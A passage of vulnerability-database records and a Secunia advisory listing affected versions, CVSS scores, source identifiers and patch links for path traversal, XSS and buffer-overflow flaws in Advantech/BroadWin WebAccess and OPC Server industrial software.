"http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0658" }, { "db": "VULHUB", "id": "VHN-52468" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001547" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-403" }, { "db": "NVD", "id": "CVE-2011-4523" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "1aba788a-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0658" }, { "db": "VULHUB", "id": "VHN-52468" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001547" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-403" }, { "db": "NVD", "id": "CVE-2011-4523" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "1aba788a-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0658" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-52468" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001547" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-403" }, { "date": "2012-02-21T13:31:55.970000", "db": "NVD", "id": "CVE-2011-4523" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0658" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-52468" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001547" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-403" }, { "date": "2024-11-21T01:32:28.580000", "db": "NVD", "id": "CVE-2011-4523" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-403" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess of bwview.asp Vulnerable to cross-site scripting", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001547" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-403" } ], "trust": 0.6 } }
var-201805-0249
Vulnerability from variot
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path transversal vulnerability has been identified, which may allow an attacker to execute arbitrary code. Advantech WebAccess Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A path traversal vulnerability exists in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201805-0249", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.0" }, { "model": "webaccess dashboard", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "2.0.15" }, { "model": "webaccess scada node", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess\\/nms", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess scada", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess dashboard", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "2.0.15" }, { "model": "webaccess/nms", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess \u003c=8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.0" }, { "model": "webaccess dashboard", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.15" }, { "model": "webaccess/nms", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.3" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess\\/nms", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.3" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "model": "webaccess scada node", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess dashboard", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess 8.2 20170817", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess dashboard", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess scada", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess nms", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2f18262-39ab-11e9-8aec-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-483" }, { "db": "CNVD", "id": "CNVD-2018-10660" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005067" }, { "db": "CNNVD", "id": "CNNVD-201805-451" }, { "db": "NVD", "id": "CVE-2018-10589" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_dashboard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_scada", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess%2fnms", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005067" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Steven Seeley (mr_me) of Offensive Security", "sources": [ { "db": "ZDI", "id": "ZDI-18-483" } ], "trust": 0.7 }, "cve": "CVE-2018-10589", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-10589", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2018-10589", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-10660", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2f18262-39ab-11e9-8aec-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-120363", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-10589", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-10589", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2018-10589", "trust": 0.8, "value": "Critical" }, { "author": "ZDI", "id": "CVE-2018-10589", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-10660", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201805-451", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "e2f18262-39ab-11e9-8aec-000c29342cb1", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-120363", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2f18262-39ab-11e9-8aec-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-483" }, { "db": "CNVD", "id": "CNVD-2018-10660" }, { "db": "VULHUB", "id": "VHN-120363" }, { "db": "JVNDB", "id": "JVNDB-2018-005067" }, { "db": "CNNVD", "id": "CNNVD-201805-451" }, { "db": "NVD", "id": "CVE-2018-10589" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path transversal vulnerability has been identified, which may allow an attacker to execute arbitrary code. Advantech WebAccess Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A path traversal vulnerability exists in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. An information-disclosure vulnerability\n3. A file-upload vulnerability\n4. Multiple directory-traversal vulnerabilities\n5. Multiple stack-based buffer-overflow vulnerabilities\n6. A heap-based buffer-overflow vulnerability\n7. Multiple arbitrary code-execution vulnerabilities\n8. A denial-of-service vulnerability\n9. A security-bypass vulnerability\n10. A privilege-escalation vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier", "sources": [ { "db": "NVD", "id": "CVE-2018-10589" }, { "db": "JVNDB", "id": "JVNDB-2018-005067" }, { "db": "ZDI", "id": "ZDI-18-483" }, { "db": "CNVD", "id": "CNVD-2018-10660" }, { "db": "BID", "id": "104190" }, { "db": "IVD", "id": "e2f18262-39ab-11e9-8aec-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-120363" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-10589", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-18-135-01", "trust": 3.4 }, { "db": "BID", "id": "104190", "trust": 2.6 }, { "db": "CNVD", "id": "CNVD-2018-10660", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201805-451", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-005067", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5627", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-483", "trust": 0.7 }, { "db": "IVD", "id": "E2F18262-39AB-11E9-8AEC-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-120363", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2f18262-39ab-11e9-8aec-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-483" }, { "db": "CNVD", "id": "CNVD-2018-10660" }, { "db": "VULHUB", "id": "VHN-120363" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005067" }, { "db": "CNNVD", "id": "CNNVD-201805-451" }, { "db": "NVD", "id": "CVE-2018-10589" } ] }, "id": "VAR-201805-0249", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e2f18262-39ab-11e9-8aec-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10660" }, { "db": "VULHUB", "id": "VHN-120363" } ], "trust": 1.5434040525000001 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f18262-39ab-11e9-8aec-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10660" } ] }, "last_update_date": "2024-11-23T21:53:07.534000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess/webaccessscada" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" }, { "title": "Patch for Advantech WebAccess Path Traversal Vulnerability (CNVD-2018-10660)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/130697" }, { "title": "Multiple Advantech Product path traversal vulnerability fixes", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80061" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-483" }, { "db": "CNVD", "id": "CNVD-2018-10660" }, { "db": "JVNDB", "id": "JVNDB-2018-005067" }, { "db": "CNNVD", "id": "CNNVD-201805-451" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-22", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-120363" }, { "db": "JVNDB", "id": "JVNDB-2018-005067" }, { "db": "NVD", "id": "CVE-2018-10589" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-135-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/104190" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10589" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10589" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-483" }, { "db": "CNVD", "id": "CNVD-2018-10660" }, { "db": "VULHUB", "id": "VHN-120363" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005067" }, { "db": "CNNVD", "id": "CNNVD-201805-451" }, { "db": "NVD", "id": "CVE-2018-10589" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2f18262-39ab-11e9-8aec-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-483" }, { "db": "CNVD", "id": "CNVD-2018-10660" }, { "db": "VULHUB", "id": "VHN-120363" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005067" }, { "db": "CNNVD", "id": "CNNVD-201805-451" }, { "db": "NVD", "id": "CVE-2018-10589" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-05-31T00:00:00", "db": "IVD", "id": "e2f18262-39ab-11e9-8aec-000c29342cb1" }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-483" }, { "date": "2018-05-31T00:00:00", "db": "CNVD", "id": "CNVD-2018-10660" }, { "date": "2018-05-15T00:00:00", "db": "VULHUB", "id": "VHN-120363" }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190" }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005067" }, { "date": "2018-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-451" }, { "date": "2018-05-15T22:29:00.267000", "db": "NVD", "id": "CVE-2018-10589" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-09-13T00:00:00", "db": "ZDI", "id": "ZDI-18-483" }, { "date": "2018-05-31T00:00:00", "db": "CNVD", "id": "CNVD-2018-10660" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-120363" }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190" }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005067" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-451" }, { "date": "2024-11-21T03:41:36.973000", "db": "NVD", "id": "CVE-2018-10589" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-451" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Path traversal vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005067" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "e2f18262-39ab-11e9-8aec-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201805-451" } ], "trust": 0.8 } }
var-201202-0038
Vulnerability from variot
Buffer overflow in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via a long string value in unspecified parameters. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
